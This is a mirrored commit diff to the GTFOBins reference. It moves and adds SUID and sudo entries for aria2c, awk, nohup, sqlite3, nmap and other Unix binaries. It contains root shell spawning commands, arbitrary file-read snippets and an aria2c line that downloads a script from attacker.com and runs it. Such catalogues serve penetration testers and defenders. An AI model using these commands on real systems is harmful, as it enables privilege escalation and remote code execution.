mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Minor fixes to SUID mainly
This commit is contained in:
commit
eba354eda0
@ -10,13 +10,6 @@ functions:
|
|||||||
aria2c --on-download-error=$TF http://x
|
aria2c --on-download-error=$TF http://x
|
||||||
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
||||||
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
||||||
suid:
|
|
||||||
- code: |
|
|
||||||
COMMAND='id'
|
|
||||||
TF=$(mktemp)
|
|
||||||
echo "$COMMAND" > $TF
|
|
||||||
chmod +x $TF
|
|
||||||
./aria2c --on-download-error=$TF http://x
|
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
@ -24,4 +17,11 @@ functions:
|
|||||||
echo "$COMMAND" > $TF
|
echo "$COMMAND" > $TF
|
||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
sudo aria2c --on-download-error=$TF http://x
|
sudo aria2c --on-download-error=$TF http://x
|
||||||
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
COMMAND='id'
|
||||||
|
TF=$(mktemp)
|
||||||
|
echo "$COMMAND" > $TF
|
||||||
|
chmod +x $TF
|
||||||
|
./aria2c --on-download-error=$TF http://x
|
||||||
---
|
---
|
||||||
|
@ -27,6 +27,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
awk '//' "$LFILE"
|
awk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./awk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -17,6 +17,11 @@ functions:
|
|||||||
ed file_to_read
|
ed file_to_read
|
||||||
,p
|
,p
|
||||||
q
|
q
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
./ed file_to_read
|
||||||
|
,p
|
||||||
|
q
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo ed
|
sudo ed
|
||||||
|
@ -27,6 +27,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
gawk '//' "$LFILE"
|
gawk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./gawk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo gawk 'BEGIN {system("/bin/sh")}'
|
- code: sudo gawk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -7,7 +7,7 @@ functions:
|
|||||||
suid:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
./hping3
|
./hping3
|
||||||
/bin/sh
|
/bin/sh -p
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo hping3
|
sudo hping3
|
||||||
|
@ -59,6 +59,8 @@ functions:
|
|||||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
||||||
file-read:
|
file-read:
|
||||||
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||||
|
suid:
|
||||||
|
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo lua -e 'os.execute("/bin/sh")'
|
- code: sudo lua -e 'os.execute("/bin/sh")'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -4,12 +4,12 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
lwp-request "file://$LFILE"
|
lwp-request "file://$LFILE"
|
||||||
suid:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./lwp-request "file://$LFILE"
|
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo lwp-request "file://$LFILE"
|
sudo lwp-request "file://$LFILE"
|
||||||
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./lwp-request "file://$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -10,6 +10,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
mawk '//' "$LFILE"
|
mawk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./mawk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo mawk 'BEGIN {system("/bin/sh")}'
|
- code: sudo mawk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -27,6 +27,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
nawk '//' "$LFILE"
|
nawk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./nawk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo nawk 'BEGIN {system("/bin/sh")}'
|
- code: sudo nawk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -85,7 +85,7 @@ functions:
|
|||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
|
echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
- description: The payload appears inside the regular nmap output.
|
- description: The payload appears inside the regular nmap output.
|
||||||
code: |
|
code: |
|
||||||
@ -94,7 +94,7 @@ functions:
|
|||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
sudo:
|
sudo:
|
||||||
- description: Input echo is disabled.
|
- description: Input echo is disabled.
|
||||||
|
@ -7,8 +7,8 @@ functions:
|
|||||||
COMMAND='/usr/bin/id'
|
COMMAND='/usr/bin/id'
|
||||||
nohup "$COMMAND"
|
nohup "$COMMAND"
|
||||||
cat nohup.out
|
cat nohup.out
|
||||||
|
suid:
|
||||||
|
- code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
||||||
suid:
|
|
||||||
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
|
||||||
---
|
---
|
||||||
|
@ -14,6 +14,14 @@ functions:
|
|||||||
.import $LFILE t
|
.import $LFILE t
|
||||||
SELECT * FROM t;
|
SELECT * FROM t;
|
||||||
EOF
|
EOF
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sqlite3 << EOF
|
||||||
|
CREATE TABLE t(line TEXT);
|
||||||
|
.import $LFILE t
|
||||||
|
SELECT * FROM t;
|
||||||
|
EOF
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
Loading…
Reference in New Issue
Block a user